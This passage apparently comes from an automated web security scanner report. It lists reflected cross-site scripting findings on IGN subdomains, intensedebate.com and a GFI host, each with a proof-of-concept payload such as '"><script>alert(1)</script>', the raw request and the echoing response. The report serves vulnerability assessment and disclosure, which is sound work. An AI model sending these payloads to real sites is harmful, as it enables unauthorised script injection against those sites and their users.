GET /remoteVisit.php670de'><script>alert(1)</script>ed9dfd6b861?acct=847fca0ae90336fffd5b60f6203a91c0&time=1297045538634 HTTP/1.1 Host: intensedebate.com Proxy-Connection: keep-alive Referer: http://thechive.com/?ign105ab01%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E958cbd566d4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Feb 2011 02:25:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/remoteVisit.php670de'><script>alert(1)</script>ed9dfd6b861?acct=847fca0ae90336fffd5b60f6203a91c0&time=1297045538634'> ...[SNIP]...
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload db679<script>alert(1)</script>a69bfead40b was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20b24'-alert(1)-'b12a295cd51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /freeware-network-security-scanner-sm20b24'-alert(1)-'b12a295cd51/ HTTP/1.1 Host: landlanss.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Date: Mon, 07 Feb 2011 01:52:35 GMT Server: TornadoServer/1.0 Content-Length: 2222 Connection: Close
1.260. http://media.ds.ign.com/media/059/059687/imgs_1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.ds.ign.com
Path:
/media/059/059687/imgs_1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df88e"-alert(1)-"d44670c575 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /media/059/059687/imgs_1.html?df88e"-alert(1)-"d44670c575=1 HTTP/1.1 Host: media.ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Pokemon Black ...[SNIP]... Guard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://media.ds.ign.com/media/059/059687/imgs_1.html?df88e"-alert(1)-"d44670c575=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.261. http://media.ds.ign.com/media/059/059687/imgs_1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.ds.ign.com
Path:
/media/059/059687/imgs_1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f47e5"><script>alert(1)</script>82481e77fa7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/059/059687/imgs_1.html?f47e5"><script>alert(1)</script>82481e77fa7=1 HTTP/1.1 Host: media.ds.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Pokemon Black ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://media.ds.ign.com/media/059/059687/imgs_1.html?f47e5"><script>alert(1)</script>82481e77fa7=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.262. http://media.ps3.ign.com/media/143/14324403/imgs_1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.ps3.ign.com
Path:
/media/143/14324403/imgs_1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 506ed"><script>alert(1)</script>7e2c06fb2d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/143/14324403/imgs_1.html?506ed"><script>alert(1)</script>7e2c06fb2d6=1 HTTP/1.1 Host: media.ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.263. http://media.ps3.ign.com/media/143/14324403/imgs_1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.ps3.ign.com
Path:
/media/143/14324403/imgs_1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21339"-alert(1)-"ed039ef01f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /media/143/14324403/imgs_1.html?21339"-alert(1)-"ed039ef01f9=1 HTTP/1.1 Host: media.ps3.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Killzone 3 Sc ...[SNIP]... rd == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://media.ps3.ign.com/media/143/14324403/imgs_1.html?21339"-alert(1)-"ed039ef01f9=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.264. http://media.xbox360.ign.com/media/064/064330/imgs_1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.xbox360.ign.com
Path:
/media/064/064330/imgs_1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c95a6"-alert(1)-"450cae54cac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /media/064/064330/imgs_1.html?c95a6"-alert(1)-"450cae54cac=1 HTTP/1.1 Host: media.xbox360.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Portal 2 Scre ...[SNIP]... == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://media.xbox360.ign.com/media/064/064330/imgs_1.html?c95a6"-alert(1)-"450cae54cac=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.265. http://media.xbox360.ign.com/media/064/064330/imgs_1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.xbox360.ign.com
Path:
/media/064/064330/imgs_1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5305b"><script>alert(1)</script>9e3eb0522b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/064/064330/imgs_1.html?5305b"><script>alert(1)</script>9e3eb0522b9=1 HTTP/1.1 Host: media.xbox360.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.266. http://media.xbox360.ign.com/media/070/070921/imgs_1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.xbox360.ign.com
Path:
/media/070/070921/imgs_1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c38a"><script>alert(1)</script>c364807e4db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/070/070921/imgs_1.html?9c38a"><script>alert(1)</script>c364807e4db=1 HTTP/1.1 Host: media.xbox360.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Marvel Vs. Ca ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://media.xbox360.ign.com/media/070/070921/imgs_1.html?9c38a"><script>alert(1)</script>c364807e4db=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.267. http://media.xbox360.ign.com/media/070/070921/imgs_1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.xbox360.ign.com
Path:
/media/070/070921/imgs_1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443fd"-alert(1)-"b71b59fd1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /media/070/070921/imgs_1.html?443fd"-alert(1)-"b71b59fd1a=1 HTTP/1.1 Host: media.xbox360.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Marvel Vs. Ca ...[SNIP]... == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://media.xbox360.ign.com/media/070/070921/imgs_1.html?443fd"-alert(1)-"b71b59fd1a=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.268. http://media.xbox360.ign.com/media/080/080342/imgs_1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.xbox360.ign.com
Path:
/media/080/080342/imgs_1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60f7a"><script>alert(1)</script>f8d66e958a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/080/080342/imgs_1.html?60f7a"><script>alert(1)</script>f8d66e958a2=1 HTTP/1.1 Host: media.xbox360.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Dragon Age II ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://media.xbox360.ign.com/media/080/080342/imgs_1.html?60f7a"><script>alert(1)</script>f8d66e958a2=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.269. http://media.xbox360.ign.com/media/080/080342/imgs_1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://media.xbox360.ign.com
Path:
/media/080/080342/imgs_1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5bce"-alert(1)-"b53c8365a56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /media/080/080342/imgs_1.html?d5bce"-alert(1)-"b53c8365a56=1 HTTP/1.1 Host: media.xbox360.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN: Dragon Age II ...[SNIP]... == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://media.xbox360.ign.com/media/080/080342/imgs_1.html?d5bce"-alert(1)-"b53c8365a56=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.270. http://movies.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c32f"-alert(1)-"ddc24aa5966 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2c32f"-alert(1)-"ddc24aa5966=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Movies: Traile ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/?2c32f"-alert(1)-"ddc24aa5966=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.271. http://movies.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 248e0"><script>alert(1)</script>42a8df6b0b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?248e0"><script>alert(1)</script>42a8df6b0b8=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.272. http://movies.ign.com/articles/114/1141199p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1141199p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29726"-alert(1)-"7eeac5e4a70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1141199p1.html?29726"-alert(1)-"7eeac5e4a70=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1141199p1.html?29726"-alert(1)-"7eeac5e4a70=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.273. http://movies.ign.com/articles/114/1141199p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1141199p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ecc"><script>alert(1)</script>48745bd64b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1141199p1.html?20ecc"><script>alert(1)</script>48745bd64b7=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.274. http://movies.ign.com/articles/114/1142532p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1142532p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 569bc"-alert(1)-"9d2b809a9f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1142532p1.html?569bc"-alert(1)-"9d2b809a9f7=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1142532p1.html?569bc"-alert(1)-"9d2b809a9f7=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.275. http://movies.ign.com/articles/114/1142532p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1142532p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d17e"><script>alert(1)</script>a390d237ff1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1142532p1.html?6d17e"><script>alert(1)</script>a390d237ff1=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.276. http://movies.ign.com/articles/114/1145692p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1145692p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4ca3"-alert(1)-"c60e1df0e35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1145692p1.html?d4ca3"-alert(1)-"c60e1df0e35=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1145692p1.html?d4ca3"-alert(1)-"c60e1df0e35=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.277. http://movies.ign.com/articles/114/1145692p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1145692p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fdcf"><script>alert(1)</script>c47403f53bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1145692p1.html?4fdcf"><script>alert(1)</script>c47403f53bf=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.278. http://movies.ign.com/articles/114/1146818p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1146818p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af10a"-alert(1)-"94c37bb0121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1146818p1.html?af10a"-alert(1)-"94c37bb0121=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1146818p1.html?af10a"-alert(1)-"94c37bb0121=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.279. http://movies.ign.com/articles/114/1146818p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1146818p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13b16"><script>alert(1)</script>cfb4a19e83a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1146818p1.html?13b16"><script>alert(1)</script>cfb4a19e83a=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.280. http://movies.ign.com/articles/114/1146819p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1146819p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da175"><script>alert(1)</script>c94f9652f68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/114/1146819p1.html?da175"><script>alert(1)</script>c94f9652f68=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.281. http://movies.ign.com/articles/114/1146819p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1146819p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b91a"-alert(1)-"3a6a8472868 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1146819p1.html?6b91a"-alert(1)-"3a6a8472868=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <base target="_top"></bas ...[SNIP]... oreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://movies.ign.com/articles/114/1146819p1.html?6b91a"-alert(1)-"3a6a8472868=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.282. http://movies.ign.com/articles/114/1147900p1.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://movies.ign.com
Path:
/articles/114/1147900p1.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8b7e"-alert(1)-"aeb1de63632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/114/1147900p1.html?d8b7e"-alert(1)-"aeb1de63632=1 HTTP/1.1 Host: movies.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
